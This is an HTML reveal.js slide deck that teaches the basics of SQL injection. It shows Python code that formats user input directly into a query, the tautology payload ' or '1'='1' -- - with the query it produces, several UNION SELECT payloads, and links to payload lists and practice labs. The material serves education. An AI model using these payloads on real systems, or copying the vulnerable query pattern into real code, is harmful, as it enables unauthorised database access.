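<!doctype html>
<html lang="en">
<head>
<meta charset="utf-8">
<meta name="generator" content="pandoc">
<meta name="author" content="Stefan Friese">
<title>Introduction to SQL Injection</title>
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
<!-- maximum-scale / user-scalable=no were dropped: they block pinch-zoom,
     which is a WCAG failure; reveal.js touch navigation does not need them. -->
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<!-- reveal.js assets come from unpkg with a floating semver range (@^4), so
     the bytes served can change between loads and cannot be pinned with
     Subresource Integrity. Before this deck is served from anywhere but a
     local checkout, pin an exact version and add
     integrity="<sha384-of-the-pinned-file>" crossorigin="anonymous" to each
     CDN <link>/<script>, or vendor the files next to robot-lung.css. -->
<link rel="stylesheet" href="https://unpkg.com/reveal.js@^4//dist/reset.css">
<link rel="stylesheet" href="https://unpkg.com/reveal.js@^4//dist/reveal.css">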
<style>
  /* Let highlighted code overflow its box inside reveal.js (see #7635). */
  .reveal .sourceCode {
    overflow: visible;
  }
  code { white-space: pre-wrap; }
  span.smallcaps { font-variant: small-caps; }
  div.columns { display: flex; gap: min(4vw, 1.5em); }
  div.column { flex: auto; overflow-x: auto; }
  div.hanging-indent { margin-left: 1.5em; text-indent: -1.5em; }
  /* The repeated [class] only raises specificity above the matching
     reveal.js rule; it selects nothing extra. */
  ul.task-list[class] { list-style: none; }
  ul.task-list li input[type="checkbox"] {
    font-size: inherit;
    width: 0.8em;
    margin: 0 0.8em 0.2em -1.6em;
    vertical-align: middle;
  }

  /* Layout for pandoc's syntax-highlighted code blocks. */
  pre > code.sourceCode { white-space: pre; position: relative; }
  pre > code.sourceCode > span { line-height: 1.25; }
  pre > code.sourceCode > span:empty { height: 1.2em; }
  .sourceCode { overflow: visible; }
  code.sourceCode > span { color: inherit; text-decoration: inherit; }
  div.sourceCode { margin: 1em 0; }
  pre.sourceCode { margin: 0; }
  @media screen {
    div.sourceCode { overflow: auto; }
  }
  @media print {
    pre > code.sourceCode { white-space: pre-wrap; }
    pre > code.sourceCode > span { display: inline-block; text-indent: -5em; padding-left: 5em; }
  }

  /* Line numbers for pre.numberSource: a CSS counter rendered in the
     ::before of each line's leading anchor, kept out of text selection. */
  pre.numberSource code { counter-reset: source-line 0; }
  pre.numberSource code > span {
    position: relative;
    left: -4em;
    counter-increment: source-line;
  }
  pre.numberSource code > span > a:first-child::before {
    content: counter(source-line);
    position: relative;
    left: -1em;
    text-align: right;
    vertical-align: baseline;
    border: none;
    display: inline-block;
    -webkit-touch-callout: none;
    -webkit-user-select: none;
    -khtml-user-select: none;
    -moz-user-select: none;
    -ms-user-select: none;
    user-select: none;
    padding: 0 4px;
    width: 4em;
    color: #aaaaaa;
  }
  pre.numberSource { margin-left: 3em; border-left: 1px solid #aaaaaa; padding-left: 4px; }
  div.sourceCode { }
  @media screen {
    pre > code.sourceCode > span > a:first-child::before { text-decoration: underline; }
  }

  /* Token colours, one class per highlighter token kind. */
  code span.al { color: #ff0000; font-weight: bold; } /* Alert */
  code span.an { color: #60a0b0; font-weight: bold; font-style: italic; } /* Annotation */
  code span.at { color: #7d9029; } /* Attribute */
  code span.bn { color: #40a070; } /* BaseN */
  code span.bu { color: #008000; } /* BuiltIn */
  code span.cf { color: #007020; font-weight: bold; } /* ControlFlow */
  code span.ch { color: #4070a0; } /* Char */
  code span.cn { color: #880000; } /* Constant */
  code span.co { color: #60a0b0; font-style: italic; } /* Comment */
  code span.cv { color: #60a0b0; font-weight: bold; font-style: italic; } /* CommentVar */
  code span.do { color: #ba2121; font-style: italic; } /* Documentation */
  code span.dt { color: #902000; } /* DataType */
  code span.dv { color: #40a070; } /* DecVal */
  code span.er { color: #ff0000; font-weight: bold; } /* Error */
  code span.ex { } /* Extension */
  code span.fl { color: #40a070; } /* Float */
  code span.fu { color: #06287e; } /* Function */
  code span.im { color: #008000; font-weight: bold; } /* Import */
  code span.in { color: #60a0b0; font-weight: bold; font-style: italic; } /* Information */
  code span.kw { color: #007020; font-weight: bold; } /* Keyword */
  code span.op { color: #666666; } /* Operator */
  code span.ot { color: #007020; } /* Other */
  code span.pp { color: #bc7a00; } /* Preprocessor */
  code span.sc { color: #4070a0; } /* SpecialChar */
  code span.ss { color: #bb6688; } /* SpecialString */
  code span.st { color: #4070a0; } /* String */
  code span.va { color: #19177c; } /* Variable */
  code span.vs { color: #4070a0; } /* VerbatimString */
  code span.wa { color: #60a0b0; font-weight: bold; font-style: italic; } /* Warning */
</style>
<!-- Theme first, then the local override sheet: robot-lung.css is loaded
     after simple.css so its rules win on equal specificity. The id="theme"
     hook is what reveal.js uses to swap themes at runtime. -->
<link rel="stylesheet" href="https://unpkg.com/reveal.js@^4//dist/theme/simple.css" id="theme">
<link rel="stylesheet" href="./robot-lung.css">
</head>
<body>
<!-- Four empty, purely decorative frame elements (presumably styled by
     robot-lung.css); they hold no content. -->
<div class="line top"></div>
<div class="line bottom"></div>
<div class="line left"></div>
<div class="line right"></div>
<!-- reveal.js deck root; .reveal and .slides are closed after the last slide. -->
<div class="reveal">
<div class="slides">
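<!-- Slide: title. The date is wrapped in <time> so it is machine-readable;
     the p.date wrapper is kept because the theme styles it. -->
<section id="title-slide">
  <h1 class="title">Introduction to SQL Injection</h1>
  <p class="author">Stefan Friese</p>
  <p class="date"><time datetime="2024-04-11">11 April, 2024</time></p>
</section>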
<!-- Slide: agenda. Each bullet is a reveal.js fragment (revealed one at a time). -->
<section id="topics" class="slide level1">
  <h1>Topics</h1>
  <ul>
    <li class="fragment">How an SQL Injection is Created</li>
    <li class="fragment">How to Exploit an SQL Injection</li>
    <li class="fragment">SPOILER: How to Prevent an SQL Injection in the Next Presentation</li>
  </ul>
</section>
<!-- Slide: lead-in to the two preconditions shown on the next two slides. -->
<section class="slide level1">
  <h2 id="how-does-it-happen">How Does it Happen</h2>
  <p>An SQL injection occurs when two things come together.</p>
</section>
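<!-- Slide: precondition 1 — a query built as a string inside the host
     language. The snippet reads as Python DB-API code (cursor.execute with a
     backslash-continued string) but is fenced as sql, so token colouring is
     approximate. Quote characters had stray spaces ('␣admin') from a
     whitespace-mangled paste; the literals are restored to 'admin' and
     's3cur3P4ssw0rd'. -->
<section class="slide level1">
  <h3 id="number-1">Number 1</h3>
  <p>An SQL query embedded as a string in another language.</p>
  <div class="sourceCode" id="cb1"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb1-1"><a href="#cb1-1" aria-hidden="true" tabindex="-1"></a>sql_query <span class="op">=</span></span>
<span id="cb1-2"><a href="#cb1-2" aria-hidden="true" tabindex="-1"></a><span class="kw">cursor</span>.<span class="kw">execute</span>(</span>
<span id="cb1-3"><a href="#cb1-3" aria-hidden="true" tabindex="-1"></a><span class="ot">"SELECT * FROM users WHERE username = 'admin' \</span></span>
<span id="cb1-4"><a href="#cb1-4" aria-hidden="true" tabindex="-1"></a><span class="kw">AND</span> <span class="kw">password</span> <span class="op">=</span> <span class="st">'s3cur3P4ssw0rd'</span><span class="ot">"</span></span>
<span id="cb1-5"><a href="#cb1-5" aria-hidden="true" tabindex="-1"></a>)</span></code></pre></div>
</section>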
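<!-- Slide: precondition 2 — untrusted input is %-formatted straight into the
     query string (line 4 of the snippet), so the input can change the
     query's structure, not just its values. The prevention side is
     deliberately deferred to the follow-up talk (see the Topics slide).
     Stray spaces after quote characters from a mangled paste are removed. -->
<section class="slide level1">
  <h3 id="number-2">Number 2</h3>
  <p>User input ends up inside a string value that is part of said SQL query.</p>
  <div class="sourceCode" id="cb2"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb2-1"><a href="#cb2-1" aria-hidden="true" tabindex="-1"></a>sql_query <span class="op">=</span></span>
<span id="cb2-2"><a href="#cb2-2" aria-hidden="true" tabindex="-1"></a><span class="kw">cursor</span>.<span class="kw">execute</span>(</span>
<span id="cb2-3"><a href="#cb2-3" aria-hidden="true" tabindex="-1"></a><span class="ot">"SELECT * FROM users WHERE username = '%s' AND password = '%s'"</span> \</span>
<span id="cb2-4"><a href="#cb2-4" aria-hidden="true" tabindex="-1"></a>% (username, <span class="kw">password</span>)</span>
<span id="cb2-5"><a href="#cb2-5" aria-hidden="true" tabindex="-1"></a>)</span></code></pre></div>
</section>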
<!-- Slide: the two steps the following slides illustrate. -->
<section class="slide level1">
  <h2 id="how-to-exploit-an-sqli-vulnerability">How to Exploit an SQLi Vulnerability</h2>
  <ul>
    <li class="fragment">Close the string through an ending quote</li>
    <li class="fragment">Continue the query with your own SQL code</li>
  </ul>
</section>
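<!-- Slide: the classic tautology payload, broken into its three parts by the
     bullets. The highlighted spans spell ' or '1'='1' -- - once the stray
     spaces from the mangled paste are removed. -->
<section class="slide level1">
  <h3 id="crafting-an-sql-query">Crafting an SQL Query</h3>
  <blockquote>
  <div class="sourceCode" id="cb3"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb3-1"><a href="#cb3-1" aria-hidden="true" tabindex="-1"></a><span class="st">' or '</span><span class="dv">1</span><span class="st">'='</span><span class="dv">1</span><span class="st">' -- -</span></span></code></pre></div>
  </blockquote>
  <ul>
    <li class="fragment">Close the existing string with: <code>'</code></li>
    <li class="fragment">Write a condition that evaluates to true: <code>1=1</code></li>
    <li class="fragment">End the SQL query through a comment: <code>-- -</code></li>
  </ul>
</section>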
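<!-- Slide: the resulting query. The commented-out tail mirrors the cb2
     template ("AND password = '%s'"; the original slide text was missing
     the "="), and everything after "-- -" is ignored by the database, which
     is why the password check no longer runs. -->
<section class="slide level1">
  <h3 id="what-does-the-query-look-like">What Does the Query Look Like</h3>
  <div class="sourceCode" id="cb4"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb4-1"><a href="#cb4-1" aria-hidden="true" tabindex="-1"></a><span class="kw">SELECT</span> <span class="op">*</span> <span class="kw">FROM</span> users <span class="kw">WHERE</span> username <span class="op">=</span> <span class="st">''</span> <span class="kw">or</span> <span class="st">'1'</span><span class="op">=</span><span class="st">'1'</span> <span class="co">-- - AND password = '%s'</span></span></code></pre></div>
  <p><em>Numbers as strings is an SQLite specific thing</em></p>
</section>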
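<!-- Slide: three further example payloads (UNION-based). Only the stray
     spaces after quote characters from the mangled paste are removed; the
     payload text is otherwise the author's. -->
<section class="slide level1">
  <h3 id="other-queries">Other Queries</h3>
  <div class="sourceCode" id="cb5"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb5-1"><a href="#cb5-1" aria-hidden="true" tabindex="-1"></a><span class="st">' UNION SELECT '</span>a<span class="st">',NULL,NULL,NULL -- -</span></span></code></pre></div>
  <div class="sourceCode" id="cb6"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb6-1"><a href="#cb6-1" aria-hidden="true" tabindex="-1"></a><span class="st">' UNION SELECT * FROM users WHERE user_id = 1 -- -</span></span></code></pre></div>
  <div class="sourceCode" id="cb7"><pre class="sourceCode sql"><code class="sourceCode sql"><span id="cb7-1"><a href="#cb7-1" aria-hidden="true" tabindex="-1"></a><span class="st">' UNION SELECT * FROM users WHERE user_id != 1337 -- -</span></span></code></pre></div>
</section>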
<!-- Slide: external references. Plain same-tab links, so no rel="noopener"
     is needed. -->
<section class="slide level1">
  <h2 id="even-more-injection-queries">Even More Injection Queries</h2>
  <ul>
    <li class="fragment"><a href="https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection">PayloadsAllTheThings</a></li>
    <li class="fragment"><a href="https://book.hacktricks.xyz/pentesting-web/sql-injection">Hacktricks SQL Injection Page</a></li>
    <li class="fragment"><a href="https://github.com/sqlmapproject/sqlmap">SQLMap</a></li>
  </ul>
</section>
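<!-- Slide: hands-on pointers. The relative links (./example,
     ./example/README.md) only resolve when the deck is served from the
     repository checkout. Stray spaces inside "presentation’s" and
     "Tryhackme’s" from the mangled paste are removed. -->
<section class="slide level1">
  <h2 id="try-for-yourself">Try for Yourself</h2>
  <ul>
    <li class="fragment"><p>Use the provided <a href="./example">example</a> inside this presentation’s repository. There is a <a href="./example/README.md">readme</a> which guides you through the setup.</p></li>
    <li class="fragment"><p>Further, try <a href="https://github.com/digininja/DVWA">Damn Vulnerable Web Application</a> which you can set up yourself or use <a href="https://tryhackme.com/r/room/dvwa">Tryhackme’s DVWA Room</a>.</p></li>
  </ul>
</section>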
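<!-- Slide: closing image. The original height="auto%" is not a valid
     dimension value and was silently ignored by browsers; dropping it lets
     the height follow the image's intrinsic aspect ratio at width 50%. -->
<section id="the-end" class="slide level1">
  <h1>The End</h1>
  <p><img src="./images/exploits_of_a_mom.png" alt="Convoluted Code" width="50%"></p>
</section>
<!-- closes .slides and .reveal opened at the top of <body> -->
</div>
</div>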
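<!-- reveal.js core and plugins are executed from unpkg with a floating
     version range (@^4) and no integrity attribute, so the served scripts
     are trusted implicitly and can change between loads. Pin an exact
     version and add integrity="<sha384-of-the-pinned-file>"
     crossorigin="anonymous" here (and on the CDN <link>s in <head>), or
     vendor the files, before hosting this deck. -->
<script src="https://unpkg.com/reveal.js@^4//dist/reveal.js"></script>
<!-- reveal.js plugins -->
<script src="https://unpkg.com/reveal.js@^4//plugin/notes/notes.js"></script>
<script src="https://unpkg.com/reveal.js@^4//plugin/search/search.js"></script>
<script src="https://unpkg.com/reveal.js@^4//plugin/zoom/zoom.js"></script>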
<script>
  // reveal.js configuration; every value below is reveal.js's documented
  // option of the same name (full list: https://revealjs.com/config/).
  // Plugins must be loaded by the <script> tags above before this runs.
  Reveal.initialize({
    // --- on-screen controls ------------------------------------------------
    controls: true,                      // arrows in the bottom-right corner
    controlsTutorial: true,              // bounce hints until the user has used them
    controlsLayout: 'bottom-right',      // or "edges"
    controlsBackArrows: 'faded',         // "faded", "hidden" or "visible"
    progress: true,                      // progress bar
    slideNumber: false,                  // no slide number shown
    showSlideNumber: 'all',              // where it would show: 'all', 'print', 'speaker'

    // --- URL hash and history ----------------------------------------------
    hash: true,                          // slide index in the URL hash (reload/share keeps position)
    hashOneBasedIndex: false,            // hash counts from 0
    respondToHashChanges: true,          // follow external hash changes
    history: false,                      // do not push every slide change to browser history

    // --- navigation ----------------------------------------------------------
    keyboard: true,
    overview: true,                      // slide overview mode
    disableLayout: false,                // keep reveal.js scaling/centering
    center: true,                        // vertically centre slides
    touch: true,
    loop: false,
    rtl: false,
    navigationMode: 'default',           // see https://revealjs.com/vertical-slides/#navigation-mode
    shuffle: false,
    fragments: true,
    fragmentInURL: true,                 // fragment position survives a reload
    embedded: false,
    help: true,                          // "?" opens the help overlay
    pause: true,                         // allow blackout
    showNotes: false,                    // speaker notes stay hidden from viewers

    // --- media and auto-advance ------------------------------------------------
    autoPlayMedia: null,                 // per-element default (null/true/false)
    preloadIframes: null,                // per-element default (null/true/false)
    autoSlide: 0,                        // ms between auto-advances; 0 disables (data-autoslide overrides)
    autoSlideStoppable: true,            // user input stops auto-sliding
    autoSlideMethod: null,
    defaultTiming: null,                 // seconds per slide for the speaker-view pacing timer

    // --- presentation chrome ---------------------------------------------------
    mouseWheel: false,
    display: 'block',                    // CSS display used to show slides
    hideInactiveCursor: true,
    hideCursorTime: 5000,                // ms of inactivity before the cursor hides
    previewLinks: false,                 // links open normally, not in an iframe overlay

    // --- transitions -----------------------------------------------------------
    transition: 'slide',                 // none/fade/slide/convex/concave/zoom
    transitionSpeed: 'default',          // default/fast/slow
    backgroundTransition: 'fade',        // none/fade/slide/convex/concave/zoom

    // --- rendering distance ----------------------------------------------------
    viewDistance: 3,                     // slides kept rendered around the current one
    mobileViewDistance: 2,               // lower on mobile to save resources

    plugins: [
      RevealNotes,
      RevealSearch,
      RevealZoom
    ]
  });
</script>
</body>
</html>